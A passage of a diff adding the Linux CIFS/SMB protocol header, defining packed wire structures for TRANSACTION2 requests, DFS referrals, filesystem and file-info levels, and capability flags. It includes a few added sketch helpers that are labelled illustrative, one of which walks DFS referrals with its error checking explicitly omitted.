++#define SMB_FIND_FILE_FULL_DIRECTORY_INFO 0x102
++#define SMB_FIND_FILE_NAMES_INFO          0x103
++#define SMB_FIND_FILE_BOTH_DIRECTORY_INFO 0x104
++#define SMB_FIND_FILE_ID_FULL_DIR_INFO    0x105
++#define SMB_FIND_FILE_ID_BOTH_DIR_INFO    0x106
++#define SMB_FIND_FILE_UNIX                0x202
++/* #define SMB_FIND_FILE_POSIX_INFO          0x064 */
++
++typedef struct smb_com_transaction2_qpi_req {
++	struct smb_hdr hdr;	/* wct = 14+ */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;
++	__u8 Reserved3;
++	__le16 SubCommand;	/* one setup word */
++	__le16 ByteCount;
++	__u8 Pad;
++	__le16 InformationLevel;
++	__u32 Reserved4;
++	char FileName[1];
++} __attribute__((packed)) TRANSACTION2_QPI_REQ;
++
++typedef struct smb_com_transaction2_qpi_rsp {
++	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++	__u16 Reserved2; /* parameter word is present for infolevels > 100 */
++} __attribute__((packed)) TRANSACTION2_QPI_RSP;
++
++typedef struct smb_com_transaction2_spi_req {
++	struct smb_hdr hdr;	/* wct = 15 */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;
++	__u8 Reserved3;
++	__le16 SubCommand;	/* one setup word */
++	__le16 ByteCount;
++	__u8 Pad;
++	__u16 Pad1;
++	__le16 InformationLevel;
++	__u32 Reserved4;
++	char FileName[1];
++} __attribute__((packed)) TRANSACTION2_SPI_REQ;
++
++typedef struct smb_com_transaction2_spi_rsp {
++	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++	__u16 Reserved2; /* parameter word is present for infolevels > 100 */
++} __attribute__((packed)) TRANSACTION2_SPI_RSP;
++
++struct set_file_rename {
++	__le32 overwrite;   /* 1 = overwrite dest */
++	__u32 root_fid;   /* zero */
++	__le32 target_name_len;
++	char  target_name[];  /* Must be unicode */
++} __attribute__((packed));
++
++struct smb_com_transaction2_sfi_req {
++	struct smb_hdr hdr;	/* wct = 15 */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;
++	__u8 Reserved3;
++	__le16 SubCommand;	/* one setup word */
++	__le16 ByteCount;
++	__u8 Pad;
++	__u16 Pad1;
++	__u16 Fid;
++	__le16 InformationLevel;
++	__u16 Reserved4;
++	__u8  payload[];
++} __attribute__((packed));
++
++struct smb_com_transaction2_sfi_rsp {
++	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++	__u16 Reserved2;	/* parameter word reserved -
++					present for infolevels > 100 */
++} __attribute__((packed));
++
++struct smb_t2_qfi_req {
++	struct	smb_hdr hdr;
++	struct	trans2_req t2;
++	__u8	Pad;
++	__u16	Fid;
++	__le16	InformationLevel;
++} __attribute__((packed));
++
++struct smb_t2_qfi_rsp {
++	struct smb_hdr hdr;     /* wct = 10 + SetupCount */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++	__u16 Reserved2;        /* parameter word reserved -
++				   present for infolevels > 100 */
++} __attribute__((packed));
++
++/*
++ * Flags on T2 FINDFIRST and FINDNEXT
++ */
++#define CIFS_SEARCH_CLOSE_ALWAYS  0x0001
++#define CIFS_SEARCH_CLOSE_AT_END  0x0002
++#define CIFS_SEARCH_RETURN_RESUME 0x0004
++#define CIFS_SEARCH_CONTINUE_FROM_LAST 0x0008
++#define CIFS_SEARCH_BACKUP_SEARCH 0x0010
++
++/*
++ * Size of the resume key on FINDFIRST and FINDNEXT calls
++ */
++#define CIFS_SMB_RESUME_KEY_SIZE 4
++
++typedef struct smb_com_transaction2_ffirst_req {
++	struct smb_hdr hdr;	/* wct = 15 */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;	/* one */
++	__u8 Reserved3;
++	__le16 SubCommand;	/* TRANS2_FIND_FIRST */
++	__le16 ByteCount;
++	__u8 Pad;
++	__le16 SearchAttributes;
++	__le16 SearchCount;
++	__le16 SearchFlags;
++	__le16 InformationLevel;
++	__le32 SearchStorageType;
++	char FileName[1];
++} __attribute__((packed)) TRANSACTION2_FFIRST_REQ;
++
++typedef struct smb_com_transaction2_ffirst_rsp {
++	struct smb_hdr hdr;	/* wct = 10 */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++} __attribute__((packed)) TRANSACTION2_FFIRST_RSP;
++
++typedef struct smb_com_transaction2_ffirst_rsp_parms {
++	__u16 SearchHandle;
++	__le16 SearchCount;
++	__le16 EndofSearch;
++	__le16 EAErrorOffset;
++	__le16 LastNameOffset;
++} __attribute__((packed)) T2_FFIRST_RSP_PARMS;
++
++typedef struct smb_com_transaction2_fnext_req {
++	struct smb_hdr hdr;	/* wct = 15 */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;	/* one */
++	__u8 Reserved3;
++	__le16 SubCommand;	/* TRANS2_FIND_NEXT */
++	__le16 ByteCount;
++	__u8 Pad;
++	__u16 SearchHandle;
++	__le16 SearchCount;
++	__le16 InformationLevel;
++	__u32 ResumeKey;
++	__le16 SearchFlags;
++	char ResumeFileName[];
++} __attribute__((packed)) TRANSACTION2_FNEXT_REQ;
++
++typedef struct smb_com_transaction2_fnext_rsp {
++	struct smb_hdr hdr;	/* wct = 10 */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++} __attribute__((packed)) TRANSACTION2_FNEXT_RSP;
++
++typedef struct smb_com_transaction2_fnext_rsp_parms {
++	__le16 SearchCount;
++	__le16 EndofSearch;
++	__le16 EAErrorOffset;
++	__le16 LastNameOffset;
++} __attribute__((packed)) T2_FNEXT_RSP_PARMS;
++
++/* QFSInfo Levels */
++#define SMB_INFO_ALLOCATION         1
++#define SMB_INFO_VOLUME             2
++#define SMB_QUERY_FS_VOLUME_INFO    0x102
++#define SMB_QUERY_FS_SIZE_INFO      0x103
++#define SMB_QUERY_FS_DEVICE_INFO    0x104
++#define SMB_QUERY_FS_ATTRIBUTE_INFO 0x105
++#define SMB_QUERY_CIFS_UNIX_INFO    0x200
++#define SMB_QUERY_POSIX_FS_INFO     0x201
++#define SMB_QUERY_POSIX_WHO_AM_I    0x202
++#define SMB_REQUEST_TRANSPORT_ENCRYPTION 0x203
++#define SMB_QUERY_FS_PROXY          0x204 /* WAFS enabled. Returns structure
++					    FILE_SYSTEM_UNIX_INFO to tell
++					    whether the new NTIOCTL (0xACE) is
++					    available for WAN friendly SMB
++					    operations */
++#define SMB_QUERY_LABEL_INFO        0x3ea
++#define SMB_QUERY_FS_QUOTA_INFO     0x3ee
++#define SMB_QUERY_FS_FULL_SIZE_INFO 0x3ef
++#define SMB_QUERY_OBJECTID_INFO     0x3f0
++
++typedef struct smb_com_transaction2_qfsi_req {
++	struct smb_hdr hdr;	/* wct = 14+ */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;
++	__u8 Reserved3;
++	__le16 SubCommand;	/* one setup word */
++	__le16 ByteCount;
++	__u8 Pad;
++	__le16 InformationLevel;
++} __attribute__((packed)) TRANSACTION2_QFSI_REQ;
++
++typedef struct smb_com_transaction_qfsi_rsp {
++	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++	__u8 Pad;	/* may be three bytes? - followed by data area */
++} __attribute__((packed)) TRANSACTION2_QFSI_RSP;
++
++typedef struct whoami_rsp_data { /* Query level 0x202 */
++	__u32 flags; /* 0 = Authenticated user, 1 = GUEST */
++	__u32 mask; /* which flag bits the server understands, ie 0x0001 */
++	__u64 unix_user_id;
++	__u64 unix_user_gid;
++	__u32 number_of_supplementary_gids; /* may be zero */
++	__u32 number_of_sids; /* may be zero */
++	__u32 length_of_sid_array; /* in bytes - may be zero */
++	__u32 pad; /* reserved - MBZ */
++	/* __u64 gid_array[0]; */  /* may be empty */
++	/* __u8 * psid_list */  /* may be empty */
++} __attribute__((packed)) WHOAMI_RSP_DATA;
++
++/* SETFSInfo Levels */
++#define SMB_SET_CIFS_UNIX_INFO    0x200
++/* level 0x203 is defined above in list of QFS info levels */
++/* #define SMB_REQUEST_TRANSPORT_ENCRYPTION 0x203 */
++
++/* Level 0x200 request structure follows */
++typedef struct smb_com_transaction2_setfsi_req {
++	struct smb_hdr hdr;	/* wct = 15 */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;	/* 4 */
++	__le16 ParameterOffset;
++	__le16 DataCount;	/* 12 */
++	__le16 DataOffset;
++	__u8 SetupCount;	/* one */
++	__u8 Reserved3;
++	__le16 SubCommand;	/* TRANS2_SET_FS_INFORMATION */
++	__le16 ByteCount;
++	__u8 Pad;
++	__u16 FileNum;		/* Parameters start. */
++	__le16 InformationLevel;/* Parameters end. */
++	__le16 ClientUnixMajor; /* Data start. */
++	__le16 ClientUnixMinor;
++	__le64 ClientUnixCap;   /* Data end */
++} __attribute__((packed)) TRANSACTION2_SETFSI_REQ;
++
++/* level 0x203 request structure follows */
++typedef struct smb_com_transaction2_setfs_enc_req {
++	struct smb_hdr hdr;	/* wct = 15 */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;	/* 4 */
++	__le16 ParameterOffset;
++	__le16 DataCount;	/* 12 */
++	__le16 DataOffset;
++	__u8 SetupCount;	/* one */
++	__u8 Reserved3;
++	__le16 SubCommand;	/* TRANS2_SET_FS_INFORMATION */
++	__le16 ByteCount;
++	__u8 Pad;
++	__u16  Reserved4;	/* Parameters start. */
++	__le16 InformationLevel;/* Parameters end. */
++	/* NTLMSSP Blob, Data start. */
++} __attribute__((packed)) TRANSACTION2_SETFSI_ENC_REQ;
++
++/* response for setfsinfo levels 0x200 and 0x203 */
++typedef struct smb_com_transaction2_setfsi_rsp {
++	struct smb_hdr hdr;	/* wct = 10 */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++} __attribute__((packed)) TRANSACTION2_SETFSI_RSP;
++
++typedef struct smb_com_transaction2_get_dfs_refer_req {
++	struct smb_hdr hdr;	/* wct = 15 */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;
++	__u8 Reserved3;
++	__le16 SubCommand;	/* one setup word */
++	__le16 ByteCount;
++	__u8 Pad[3];		/* Win2K has sent 0x0F01 (max response length
++				   perhaps?) followed by one byte pad - doesn't
++				   seem to matter though */
++	__le16 MaxReferralLevel;
++	char RequestFileName[1];
++} __attribute__((packed)) TRANSACTION2_GET_DFS_REFER_REQ;
++
++#define DFS_VERSION cpu_to_le16(0x0003)
++
++/* DFS server target type */
++#define DFS_TYPE_LINK 0x0000  /* also for sysvol targets */
++#define DFS_TYPE_ROOT 0x0001
++
++/* Referral Entry Flags */
++#define DFS_NAME_LIST_REF 0x0200 /* set for domain or DC referral responses */
++#define DFS_TARGET_SET_BOUNDARY 0x0400 /* only valid with version 4 dfs req */
++
++typedef struct dfs_referral_level_3 { /* version 4 is same, + one flag bit */
++	__le16 VersionNumber;  /* must be 3 or 4 */
++	__le16 Size;
++	__le16 ServerType; /* 0x0001 = root targets; 0x0000 = link targets */
++	__le16 ReferralEntryFlags;
++	__le32 TimeToLive;
++	__le16 DfsPathOffset;
++	__le16 DfsAlternatePathOffset;
++	__le16 NetworkAddressOffset; /* offset of the link target */
++	__u8   ServiceSiteGuid[16];  /* MBZ, ignored */
++} __attribute__((packed)) REFERRAL3;
++
++struct get_dfs_referral_rsp {
++	__le16 PathConsumed;
++	__le16 NumberOfReferrals;
++	__le32 DFSFlags;
++	REFERRAL3 referrals[1];	/* array of level 3 dfs_referral structures */
++	/* followed by the strings pointed to by the referral structures */
++} __packed;
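++
++/*
++ * Illustrative sketch (not part of the original header, name hypothetical):
++ * walking the variable-length referral array above. Each REFERRAL3 carries
++ * its own Size, and (per MS-DFSC for version 3/4 referrals) the string
++ * offsets are relative to the start of that referral entry. Error checking
++ * and UTF-16 conversion are omitted.
++ */
++static inline void walk_dfs_referrals_sketch(struct get_dfs_referral_rsp *rsp)
++{
++	char *pos = (char *)rsp->referrals;
++	int i;
++
++	for (i = 0; i < le16_to_cpu(rsp->NumberOfReferrals); i++) {
++		REFERRAL3 *ref = (REFERRAL3 *)pos;
++		/* UTF-16LE link target, offset from this referral entry */
++		__le16 *target = (__le16 *)(pos +
++				 le16_to_cpu(ref->NetworkAddressOffset));
++
++		(void)target;	/* convert and consume the target here */
++		pos += le16_to_cpu(ref->Size);
++	}
++}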
++
++typedef struct smb_com_transaction_get_dfs_refer_rsp {
++	struct smb_hdr hdr;	/* wct = 10 */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++	__u8 Pad;
++	struct get_dfs_referral_rsp dfs_data;
++} __packed TRANSACTION2_GET_DFS_REFER_RSP;
++
++/* DFS Flags */
++#define DFSREF_REFERRAL_SERVER  0x00000001 /* all targets are DFS roots */
++#define DFSREF_STORAGE_SERVER   0x00000002 /* no further ref requests needed */
++#define DFSREF_TARGET_FAILBACK  0x00000004 /* only for DFS referral version 4 */
++
++/*
++ ************************************************************************
++ * All structs for everything above the SMB PDUs themselves
++ * (such as the T2 level specific data) go here
++ ************************************************************************
++ */
++
++/*
++ * Information on a server
++ */
++
++struct serverInfo {
++	char name[16];
++	unsigned char versionMajor;
++	unsigned char versionMinor;
++	unsigned long type;
++	unsigned int commentOffset;
++} __attribute__((packed));
++
++/*
++ * The following structure is the format of the data returned on a NetShareEnum
++ * with level "90" (x5A)
++ */
++
++struct shareInfo {
++	char shareName[13];
++	char pad;
++	unsigned short type;
++	unsigned int commentOffset;
++} __attribute__((packed));
++
++struct aliasInfo {
++	char aliasName[9];
++	char pad;
++	unsigned int commentOffset;
++	unsigned char type[2];
++} __attribute__((packed));
++
++struct aliasInfo92 {
++	int aliasNameOffset;
++	int serverNameOffset;
++	int shareNameOffset;
++} __attribute__((packed));
++
++typedef struct {
++	__le64 TotalAllocationUnits;
++	__le64 FreeAllocationUnits;
++	__le32 SectorsPerAllocationUnit;
++	__le32 BytesPerSector;
++} __attribute__((packed)) FILE_SYSTEM_INFO;	/* size info, level 0x103 */
++
++typedef struct {
++	__le32 fsid;
++	__le32 SectorsPerAllocationUnit;
++	__le32 TotalAllocationUnits;
++	__le32 FreeAllocationUnits;
++	__le16  BytesPerSector;
++} __attribute__((packed)) FILE_SYSTEM_ALLOC_INFO;
++
++typedef struct {
++	__le16 MajorVersionNumber;
++	__le16 MinorVersionNumber;
++	__le64 Capability;
++} __attribute__((packed)) FILE_SYSTEM_UNIX_INFO; /* Unix extension level 0x200*/
++
++/* Version numbers for CIFS UNIX major and minor. */
++#define CIFS_UNIX_MAJOR_VERSION 1
++#define CIFS_UNIX_MINOR_VERSION 0
++
++/* Linux/Unix extensions capability flags */
++#define CIFS_UNIX_FCNTL_CAP             0x00000001 /* support for fcntl locks */
++#define CIFS_UNIX_POSIX_ACL_CAP         0x00000002 /* support getfacl/setfacl */
++#define CIFS_UNIX_XATTR_CAP             0x00000004 /* support new namespace   */
++#define CIFS_UNIX_EXTATTR_CAP           0x00000008 /* support chattr/chflag   */
++#define CIFS_UNIX_POSIX_PATHNAMES_CAP   0x00000010 /* Allow POSIX path chars  */
++#define CIFS_UNIX_POSIX_PATH_OPS_CAP    0x00000020 /* Allow new POSIX path based
++						      calls including posix open
++						      and posix unlink */
++#define CIFS_UNIX_LARGE_READ_CAP        0x00000040 /* support reads >128K (up
++						      to 0xFFFF00) */
++#define CIFS_UNIX_LARGE_WRITE_CAP       0x00000080
++#define CIFS_UNIX_TRANSPORT_ENCRYPTION_CAP 0x00000100 /* can do SPNEGO crypt */
++#define CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP  0x00000200 /* must do  */
++#define CIFS_UNIX_PROXY_CAP             0x00000400 /* Proxy cap: 0xACE ioctl and
++						      QFS PROXY call */
++#ifdef CONFIG_CIFS_POSIX
++/* We presumably don't need the 0x20 POSIX_PATH_OPS_CAP since we never send
++   LockingX instead of the posix locking call on a unix session (and we do
++   not expect LockingX to use different (ie Windows) semantics than posix
++   locking on the same session). If WINE needs to do this later, we can add
++   this cap back in. */
++/* #define CIFS_UNIX_CAP_MASK              0x000000fb */
++#define CIFS_UNIX_CAP_MASK              0x000003db
++#else
++#define CIFS_UNIX_CAP_MASK              0x00000013
++#endif /* CONFIG_CIFS_POSIX */
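++
++/*
++ * Illustrative note (not part of the original header): the POSIX-enabled
++ * mask is just the OR of the individual capability bits negotiated by the
++ * client; 0x000003db is everything above except XATTR (0x04) and
++ * POSIX_PATH_OPS (0x20). A compile-time check (sketch, using the kernel's
++ * static_assert()) makes that composition explicit:
++ */
++static_assert((CIFS_UNIX_FCNTL_CAP | CIFS_UNIX_POSIX_ACL_CAP |
++	       CIFS_UNIX_EXTATTR_CAP | CIFS_UNIX_POSIX_PATHNAMES_CAP |
++	       CIFS_UNIX_LARGE_READ_CAP | CIFS_UNIX_LARGE_WRITE_CAP |
++	       CIFS_UNIX_TRANSPORT_ENCRYPTION_CAP |
++	       CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP) == 0x000003db);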
++
++
++#define CIFS_POSIX_EXTENSIONS           0x00000010 /* support for new QFSInfo */
++
++typedef struct {
++	/* For undefined recommended transfer size return -1 in that field */
++	__le32 OptimalTransferSize;  /* bsize on some os, iosize on other os */
++	__le32 BlockSize;
++	/* The next three fields are in terms of the block size (above).
++	   If the block size is unknown, 4096 would be a reasonable block
++	   size for a server to report. Note that returning the blocks and
++	   blocks-available counts removes the need to make a second call
++	   (to QFSInfo level 0x103) to get this info. UserBlocksAvail is
++	   typically less than or equal to BlocksAvail; if no distinction
++	   is made, return the same value in each. */
++	__le64 TotalBlocks;
++	__le64 BlocksAvail;       /* bfree */
++	__le64 UserBlocksAvail;   /* bavail */
++    /* For undefined Node fields or FSID return -1 */
++	__le64 TotalFileNodes;
++	__le64 FreeFileNodes;
++	__le64 FileSysIdentifier;   /* fsid */
++	/* NB Namelen comes from FILE_SYSTEM_ATTRIBUTE_INFO call */
++	/* NB flags can come from FILE_SYSTEM_DEVICE_INFO call   */
++} __attribute__((packed)) FILE_SYSTEM_POSIX_INFO;
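++
++/*
++ * Illustrative sketch (not part of the original header, name hypothetical):
++ * folding the level 0x201 data above into a statfs-style reply, following
++ * the field comments (bsize/bfree/bavail/fsid). Handling of the -1
++ * "undefined" markers is omitted.
++ */
++static inline void posix_fs_info_to_statfs_sketch(
++		const FILE_SYSTEM_POSIX_INFO *info, struct kstatfs *st)
++{
++	st->f_bsize  = le32_to_cpu(info->BlockSize);
++	st->f_blocks = le64_to_cpu(info->TotalBlocks);
++	st->f_bfree  = le64_to_cpu(info->BlocksAvail);		/* bfree */
++	st->f_bavail = le64_to_cpu(info->UserBlocksAvail);	/* bavail */
++	st->f_files  = le64_to_cpu(info->TotalFileNodes);
++	st->f_ffree  = le64_to_cpu(info->FreeFileNodes);
++}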
++
++/* DeviceType Flags */
++#define FILE_DEVICE_CD_ROM              0x00000002
++#define FILE_DEVICE_CD_ROM_FILE_SYSTEM  0x00000003
++#define FILE_DEVICE_DFS                 0x00000006
++#define FILE_DEVICE_DISK                0x00000007
++#define FILE_DEVICE_DISK_FILE_SYSTEM    0x00000008
++#define FILE_DEVICE_FILE_SYSTEM         0x00000009
++#define FILE_DEVICE_NAMED_PIPE          0x00000011
++#define FILE_DEVICE_NETWORK             0x00000012
++#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014
++#define FILE_DEVICE_NULL                0x00000015
++#define FILE_DEVICE_PARALLEL_PORT       0x00000016
++#define FILE_DEVICE_PRINTER             0x00000018
++#define FILE_DEVICE_SERIAL_PORT         0x0000001b
++#define FILE_DEVICE_STREAMS             0x0000001e
++#define FILE_DEVICE_TAPE                0x0000001f
++#define FILE_DEVICE_TAPE_FILE_SYSTEM    0x00000020
++#define FILE_DEVICE_VIRTUAL_DISK        0x00000024
++#define FILE_DEVICE_NETWORK_REDIRECTOR  0x00000028
++
++/* Device Characteristics */
++#define FILE_REMOVABLE_MEDIA			0x00000001
++#define FILE_READ_ONLY_DEVICE			0x00000002
++#define FILE_FLOPPY_DISKETTE			0x00000004
++#define FILE_WRITE_ONCE_MEDIA			0x00000008
++#define FILE_REMOTE_DEVICE			0x00000010
++#define FILE_DEVICE_IS_MOUNTED			0x00000020
++#define FILE_VIRTUAL_VOLUME			0x00000040
++#define FILE_DEVICE_SECURE_OPEN			0x00000100
++#define FILE_CHARACTERISTIC_TS_DEVICE		0x00001000
++#define FILE_CHARACTERISTIC_WEBDAV_DEVICE	0x00002000
++#define FILE_PORTABLE_DEVICE			0x00004000
++#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000
++
++typedef struct {
++	__le32 DeviceType;
++	__le32 DeviceCharacteristics;
++} __attribute__((packed)) FILE_SYSTEM_DEVICE_INFO; /* device info level 0x104 */
++
++/* minimum includes first three fields, and empty FS Name */
++#define MIN_FS_ATTR_INFO_SIZE 12
++
++
++/* List of FileSystemAttributes - see 2.5.1 of MS-FSCC */
++#define FILE_SUPPORTS_SPARSE_VDL	0x10000000 /* faster nonsparse extend */
++#define FILE_SUPPORTS_BLOCK_REFCOUNTING	0x08000000 /* allow ioctl dup extents */
++#define FILE_SUPPORT_INTEGRITY_STREAMS	0x04000000
++#define FILE_SUPPORTS_USN_JOURNAL	0x02000000
++#define FILE_SUPPORTS_OPEN_BY_FILE_ID	0x01000000
++#define FILE_SUPPORTS_EXTENDED_ATTRIBUTES 0x00800000
++#define FILE_SUPPORTS_HARD_LINKS	0x00400000
++#define FILE_SUPPORTS_TRANSACTIONS	0x00200000
++#define FILE_SEQUENTIAL_WRITE_ONCE	0x00100000
++#define FILE_READ_ONLY_VOLUME		0x00080000
++#define FILE_NAMED_STREAMS		0x00040000
++#define FILE_SUPPORTS_ENCRYPTION	0x00020000
++#define FILE_SUPPORTS_OBJECT_IDS	0x00010000
++#define FILE_VOLUME_IS_COMPRESSED	0x00008000
++#define FILE_SUPPORTS_REMOTE_STORAGE	0x00000100
++#define FILE_SUPPORTS_REPARSE_POINTS	0x00000080
++#define FILE_SUPPORTS_SPARSE_FILES	0x00000040
++#define FILE_VOLUME_QUOTAS		0x00000020
++#define FILE_FILE_COMPRESSION		0x00000010
++#define FILE_PERSISTENT_ACLS		0x00000008
++#define FILE_UNICODE_ON_DISK		0x00000004
++#define FILE_CASE_PRESERVED_NAMES	0x00000002
++#define FILE_CASE_SENSITIVE_SEARCH	0x00000001
++typedef struct {
++	__le32 Attributes;
++	__le32 MaxPathNameComponentLength;
++	__le32 FileSystemNameLen;
++	char FileSystemName[52]; /* do not have to save this - get subset? */
++} __attribute__((packed)) FILE_SYSTEM_ATTRIBUTE_INFO;
++
++/******************************************************************************/
++/* QueryFileInfo/QueryPathinfo (also for SetPath/SetFile) data buffer formats */
++/******************************************************************************/
++typedef struct { /* data block encoding of response to level 263 QPathInfo */
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le32 Attributes;
++	__u32 Pad1;
++	__le64 AllocationSize;
++	__le64 EndOfFile;	/* size ie offset to first free byte in file */
++	__le32 NumberOfLinks;	/* hard links */
++	__u8 DeletePending;
++	__u8 Directory;
++	__u16 Pad2;
++	__le64 IndexNumber;
++	__le32 EASize;
++	__le32 AccessFlags;
++	__u64 IndexNumber1;
++	__le64 CurrentByteOffset;
++	__le32 Mode;
++	__le32 AlignmentRequirement;
++	__le32 FileNameLength;
++	char FileName[1];
++} __attribute__((packed)) FILE_ALL_INFO;	/* level 0x107 QPathInfo */
++
++typedef struct {
++	__le64 AllocationSize;
++	__le64 EndOfFile;	/* size ie offset to first free byte in file */
++	__le32 NumberOfLinks;	/* hard links */
++	__u8 DeletePending;
++	__u8 Directory;
++	__u16 Pad;
++} __attribute__((packed)) FILE_STANDARD_INFO;	/* level 0x102 QPathInfo */
++
++
++/* defines for enumerating possible values of the Unix type field below */
++#define UNIX_FILE      0
++#define UNIX_DIR       1
++#define UNIX_SYMLINK   2
++#define UNIX_CHARDEV   3
++#define UNIX_BLOCKDEV  4
++#define UNIX_FIFO      5
++#define UNIX_SOCKET    6
++typedef struct {
++	__le64 EndOfFile;
++	__le64 NumOfBytes;
++	__le64 LastStatusChange; /* SNIA specs DCE time for the 3 time fields */
++	__le64 LastAccessTime;
++	__le64 LastModificationTime;
++	__le64 Uid;
++	__le64 Gid;
++	__le32 Type;
++	__le64 DevMajor;
++	__le64 DevMinor;
++	__le64 UniqueId;
++	__le64 Permissions;
++	__le64 Nlinks;
++} __attribute__((packed)) FILE_UNIX_BASIC_INFO;	/* level 0x200 QPathInfo */
++
++typedef struct {
++	char LinkDest[1];
++} __attribute__((packed)) FILE_UNIX_LINK_INFO;	/* level 0x201 QPathInfo */
++
++/* The following three structures are needed only for
++	setting time to NT4 and some older servers via
++	the primitive DOS time format */
++typedef struct {
++	__u16 Day:5;
++	__u16 Month:4;
++	__u16 Year:7;
++} __attribute__((packed)) SMB_DATE;
++
++typedef struct {
++	__u16 TwoSeconds:5;
++	__u16 Minutes:6;
++	__u16 Hours:5;
++} __attribute__((packed)) SMB_TIME;
++
++typedef struct {
++	__le16 CreationDate; /* SMB Date see above */
++	__le16 CreationTime; /* SMB Time */
++	__le16 LastAccessDate;
++	__le16 LastAccessTime;
++	__le16 LastWriteDate;
++	__le16 LastWriteTime;
++	__le32 DataSize; /* File Size (EOF) */
++	__le32 AllocationSize;
++	__le16 Attributes; /* verify not u32 */
++	__le32 EASize;
++} __attribute__((packed)) FILE_INFO_STANDARD;  /* level 1 SetPath/FileInfo */
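++
++/*
++ * Illustrative sketch (not part of the original header, name hypothetical):
++ * packing a calendar date into the DOS-era bitfields above. Years count
++ * from 1980 and seconds are stored at two-second granularity, hence the
++ * TwoSeconds field. The bitfield layout assumed here is the little-endian
++ * wire layout; the real client has its own conversion routines.
++ */
++static inline void fill_dos_date_time_sketch(SMB_DATE *d, SMB_TIME *t,
++					     int year, int month, int day,
++					     int hour, int min, int sec)
++{
++	d->Year  = year - 1980;		/* DOS epoch is 1980 */
++	d->Month = month;		/* 1..12 */
++	d->Day   = day;			/* 1..31 */
++	t->Hours      = hour;
++	t->Minutes    = min;
++	t->TwoSeconds = sec / 2;	/* 2-second resolution */
++}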
++
++typedef struct {
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le32 Attributes;
++	__u32 Pad;
++} __attribute__((packed)) FILE_BASIC_INFO;	/* size info, level 0x101 */
++
++struct file_allocation_info {
++	__le64 AllocationSize; /* Note old Samba srvr rounds this up too much */
++} __attribute__((packed));	/* size used on disk, for level 0x103 for set,
++				   0x105 for query */
++
++struct file_end_of_file_info {
++	__le64 FileSize;		/* offset to end of file */
++} __attribute__((packed)); /* size info, level 0x104 for set, 0x106 for query */
++
++struct file_alt_name_info {
++	__u8   alt_name[1];
++} __attribute__((packed));      /* level 0x0108 */
++
++struct file_stream_info {
++	__le32 number_of_streams;  /* BB check sizes and verify location */
++	/* followed by info on streams themselves
